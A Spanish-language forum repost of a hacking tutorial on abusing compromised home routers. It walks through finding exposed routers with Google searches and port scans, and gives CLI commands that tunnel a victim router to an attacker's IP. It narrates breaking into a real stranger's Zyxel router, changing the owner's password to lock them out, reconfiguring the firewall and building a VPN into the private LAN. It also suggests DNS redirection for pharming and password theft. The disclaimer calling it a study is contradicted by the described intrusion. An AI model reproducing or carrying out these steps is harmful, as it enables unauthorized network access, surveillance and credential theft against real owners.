Buenas:
Os pongo un copy paste de un excelente trabajo de Vic_Thor
PARTE I
Y tras el router… Qué?
Bueno… esto no es que sea del todo muy, bueno… ya me entendéis.
En este hilo preguntaba nuestro compañero jochy “Cómo atacar desde el router”
http://www.wadalbertia.org/foro/viewtopic.php?f=4&t=5993Bueno, pues la gente responde que si Upnp, que si hacer nat, que si meter un host a la DMZ, etc, etc…
Todas ellas son válidas, por supuesto, pero vamos a dar un par de pasos mas.
El primero, por qué no redirigir el DNS???
Pues claro!!! Si ya tenemos acceso al router podemos enviar las peticiones de los legítimos clientes de la LAN a un DNS bajo control del atacante, luego éste puede responder con las resoluciones que mas interese… con lo cual eso del pharming, phising, etc, está servido.
De hecho, se pueden hacer auténticas “diabluras” y con poco “esfuerzo” por parte del atacante. Si el “atacante” además de simplemente sustituir la resolución de nombres por las falsificadas está un poco espabilado, puede juguetear con proxys inversos de tal forma, que además de soplarle las contraseñas de autenticación tipo Facebook, foros, etc… no tiene ni porque “falsear” la web auténtica.. ni hacer complicadas páginas que “parezcan” iguales a las originales, sencillamente puede hacer pasar por su máquina todo lo que se le antoje.
Interesante, no?? Pues eso para otro post, que en este toca otra cosa…
En el hilo que anteriormente mencionaba, el de jochy, respondí algo así:
“Si tienes acceso al router (a su configuración) y si es un router "majo" puedes hasta crear un túnel (incluso vpn) con otro router de internet... puedes hacer pasar TODO el tráfico de esa lan por tu ordenador (tu sabrás lo que haces luego con eso) y/o si configuras una vpn, pues eso... que como si estuvieses sentadito en esa red.
….
….”
Esa respuesta tiene dos vertientes:
1.- Hacer pasar el tráfico de esa red por tu lan
2.- Crear un túnel y/o VPN para conectarte a esa Lan desde tu PC.
En este post tratamos sólo el caso 2 (que ya es bastante) y también dejaremos el caso 1 para otro momento…. Así que por ahora tenemos pendiente el tema de los DNS y del enrutamiento hacia la máquina del atacante que podríamos llamarlo algo así como “esnifar desde Internet”
Como todo en la vida lo que vamos a realizar requiere de algunos conocimientos (pocos) para por lo menos saber lo que estamos haciendo y también de las herramientas necesarias.
Para “manipular” el router remoto y acceder a la lan que protege necesitamos:
a.- Acceder al router como administrador
b.- Que el router permita la creación de túneles y/o VPN
c.- Que el atacante disponga de un router que permita lo mismo y/o usar clientes de conexión VPN
Lo mas sencillo sería que el atacante utilice un router idéntico al de la víctima, por supuestísismo que esto no es obligatorio, pero simplifica las cosas si queremos crear (por ejemplo) un túnel sitio-a-sitio (obviamente el atacante ya se asegurará de bloquear las conexiones que inicien los clientes-víctima hacia su propia LAN y permitir sólo las que inicie él)
Lamentablemente Internet está lleno de routers expuestos a este tipo de ataques… principalmente porque los colocan así como vienen de fábrica y no se preocupan o no saben ni cambiar el pass de acceso, por ello hay que ser “legales” y tomar este documento como un estudio y no como un arma.
Por ejemplo, supongamos que tenemos un router BT Voyager, SAR110-130, etc…, NetGear DM600, DLink RTA o cualquiera de esos GlobeSpanVirata o Viking.
Buscar “indefensos” propietarios de esos routers en Internet es juego de niños, basta con ir a Google, buscar en foros, blogs, etc… y los encontramos sin mas.
Veamos un ejemplo… Supongamos que queremos encontrar uno de ellos, (como “novedad” lo vamos a ver en un vídeo)
http://free.7host05.com/verolulu/vpnswf/Buscador1.swfComo ves, acabamos de encontrar (Google lo encontró) unas cuantas entradas…
Escogí la segunda esa que pone login, en ella vemos una ip, así que vamos escanear el rango de ip’s que nos mostraba Google.
Para ello podemos usar cualquier escáner, yo escogí superscan que es muy rápido y sólo los puertos 80, 23 y 8080… tras unos pocos intentos… lo encontramos:
http://free.7host05.com/verolulu/vpnswf/Superscan.swfEn el vídeo vemos que se trata de un router GS8100, por lo que vamos a necesitar ls documentación del mismo para poder crear el túnel.
Este tipo de Routers basados en GlobeSpanVirata no permiten la configuración de túneles y vpn por el interface web, toca hacerlo por línea de comandos.
Así que buscamos la documentación:
http://free.7host05.com/verolulu/vpnswf/Buscador2.swfVale, ya tenemos el manual y todo…
Para crear un tunel L2TP entre ese router y el nuestro tendríamos que poner algo así:
$create l2tp tunnel config ifname l2t-0 localip 190.42.42.236 remoteip 88.6.15.2 localhostname RASCA remotehostname PICA start initiator remote
donde localip es la direccion ip de “la víctima” y remoteip es la direccion ip del atacante.
Obviamente el atacante, debería también configurar su router “dando la vuelta” a los parámetros…
$create l2tp tunnel config ifname l2t-0 localip 88.6.15.2 remoteip 190.42.42.236 localhostname PICA remotehostname RASCA start initiator local
El video:
http://free.7host05.com/verolulu/vpnswf/create.swfDesgraciada o afortunadamente ese modelo de router no cuenta con el firmware actualizado para implementar túneles y/o VPN, hombre… ya puestos podríamos actualizarle el software al router (cosa que no voy a hacer) pero podría ser así:
http://free.7host05.com/verolulu/vpnswf/Upgrade1.swfNo le actualicé el firmware (por supuesto) aunque a lo mejor le venía hasta bien, jejeje, pero entre otras cosas como tiene ip dinámica después del upgrade hay que reiniciarlo y claro, ya no será la misma Ip y habría que buscarlo de nuevo (cosa que tampoco sería gran problema, pero mejor no tocarlo)
Así que con las mismas, vamos a buscar otros routers “vulnerables” mejor con IP fija y a ser posible que no haya que actualizarles el firmware….
Para esta práctica… pues buscamos lo “fácil” que son los Zyxel de telefónica.
Digo que son los fáciles porque averiguar rangos de ip’s estáticas de telefónica es una sencilla consulta en Google o en RIPE, y saber si el router lleva el firmware actualizado basta con ver en las cabeceras de la conexión http algo así como:
http/1.1 401 Unautorized.WWW-Autenticate: Basic realm=”Prestige 650H/HW-33”…
En este video vemos el scan de esa red… permitidme que distorsione las mismas, son estáticas y … bueno, por si acaso….
http://free.7host05.com/verolulu/vpnswf/Zyxel.swfVale, ya tenemos a nuestro “conejillo de indias”, no sé quienes o quienes son, vamos a ver como está ese router, una cosa… como “no quería” que el auténtico propietario del router accediese al mismo mientras “trabajaba” pues simplemente le cambié la contraseña… luego lo dejaré todo como lo encontré.
Además, para crear la VPN va a ser necesario poner la IP o el nombre de dominio del atacante… vamos, que si acceden al router podrán ver nuestros datos… y eso no está bien.
De éste vídeo averiguaremos que:
* La dirección de la LAN que utiliza es 192.168.0.0 255.255.255.0
* La dirección IP del router interna es 192.168.0.1
* No tiene activado el Firewall
* No tiene activado ningún túnel ni VPN
* No tiene reglas internas de firewall
* No tiene reglas externas de firewall
* No hay Logs ni para VPN ni para el firewall
* NAT hacia la dirección 192.168.0.100 para escritorio remoto (puerto 3389 de TCP)
Lógicamente si no tiene el Firewall activado es normal que no disponga de reglas para el mismo y tampoco existan logs
También es lógico que al no existir VPN definidas tampoco existan reglas ni logs de acceso.
Una cosa importante!!!! Que luego volveré a recordar, cuando activemos el cortafuegos que no se nos olvide añadir reglas de permiso desde Internet hacia el router por los puertos 80 y/o 23 puesto que si no lo hacemos así, perderemos la conexión por la web o Telnet con el router…
Lo vemos, entonces…
http://free.7host05.com/verolulu/vpnswf/router1.swfBueno, en el siguiente video vamos a habilitar el firewall con las reglas que nos permitan conectarnos mediante un cliente VPN o un router para poder crear el túnel cliente a sitio o sitio a sitio.
También vamos a añadir las reglas necesarias para Telnet y para el puerto 80 de http y bueno… meteremos también icmp para comprobar que está online mediante un ping.
Las reglas del firewall se pueden/deben aplicar desde la LAN a Internet y desde Internet a la LAN, la primera serán los puertos y/o protocolos que permiten a los clientes de la red salir a Internet y la segunda lo contrario, lo que se permite desde Internet a la red local.
También es importante advertir que hasta que el firewall no esté activo ninguna de las reglas se aplican, recordad activar el firewall DESPUES de añadir las reglas o perderéis la conexión.
De momento veamos el vídeo para crear las reglas internas que por defecto le vamos a dejar salir por todos los puertos y protocolos, y las reglas externas que filtramos las conexiones desde Internet únicamente a 80 y 23 de TCP mas lo del ICMP
Como vimos antes, el administrador de este router hizo nat hacia una máquina por el puerto 3389 (Escritorio remoto) pues también crearemos esa regla para que lo pueda seguir haciendo una vez apliquemos las reglas y activemos el cortafuegos.
También podríamos dejar pasar el protocolo DNS, no estaría mal… eso lo haremos luego de otra forma a lo que veremos a continuación
http://free.7host05.com/verolulu/vpnswf/router2.swfVale, ahora tocan las reglas de la VPN, en esta ocasión en lugar de crear una regla para cada puerto-protocolo, vamos a agruparlas TODAS en una sola, el efecto es el mismo que si definimos una por una… pero es mas corto… a ello:
http://free.7host05.com/verolulu/vpnswf/router3.swfSegún hemos visto, permitimos IPSEC, GRE, PPtP, AH e IKE, no es preciso que estén todos ellos, depende de la vpn que deseemos crear, en nuestro caso no sobrarían GRE y PPtP, pero bueno… por si acaso me/nos da por crear un túnel “versus RRAS de Windows Server” (este utiliza PPtP 1723 de TCP) o por si nos da por un Cisco con GRE… vamos que ya lo tenemos.
También habréis notado que habilité los logs para en las reglas del firewall para la VPN, esto lo hago por si acaso hay algún problema en la conexión poder ver los mensajes de error, por ejemplo problemas de autenticación, apertura del túnel, etc…
Nos faltaría activar el firewall y crear la VPN, ahora lo hacemos:
http://free.7host05.com/verolulu/vpnswf/router4.swfAntes de configurar la VPN hay que saber la configuración del atacante, es decir, de mi equipo, router, ip’s…
http://free.7host05.com/verolulu/vpnswf/Ataca1.swfResumiendo, configuración LOCAL del atacante:IP: 172.28.1.48 255.255.255.0
IP Interna del Router: 172.28.1.10
IP Pública del Router: 83.60.158.126
La configuración de la Víctima:RED: 192.168.0.0 255.255.255.0
IP interna del router: 192.168.0.1
IP Pública del router: xxx.xxx.xxx.xxx (ya sabéis por qué no la pongo…)
Esto (o parte de esto) hay que ponerlo en la configuración de la VPN, vamos…
http://free.7host05.com/verolulu/vpnswf/router5.swfVale, pues ya tenemos la VPN creada, ahora sólo hay que “probar”
Necesitamos un cliente VPN y configurarlo con los parámetros del servidor VPN, nos vamos a descargar uno cualquiera (el vpn client de cisco mejor no que tiene sus particularidades…) yo escogí este:
TheGreenBow vpn client, lo podemos bajar de aquí:
http://www.thegreenbow.fr/cgi-bin/thegreenbow_vpn_client.exe?ENLa instalación es como las de siempre… siguiente, siguiente, …. Y finalizar.
Eso si, es MUY IMPORTANTE que tras la instalación del cliente vpn REINICIES el equipo o no funcionará.
Ahora veamos esto, lo primero que hay que hacer es ELIMINAR toda la configuración inicial y crear la nuestra propia….
http://free.7host05.com/verolulu/vpnswf/router6.swfY tras eso, pues bueno… podemos escanear la red 192.168.0.0 en busca de equipos, recursos compartidos, etc…
Pues eso, que espero que haya sido “instructivo” y que lo disfrutéis… pero… hombre, no pensarás que te vas a escapar de la “carga teórica”, eh!!
Recuerdo que hace años puse unos pdfs de VPN, no sé si aquí o en el extinto HxC, pero bueno, vamos a hacer un repaso rápido a la VPN de esta práctica, pero como no me lo permite el sueeeeñoooo que tengo lo haré a lo largo de la semana.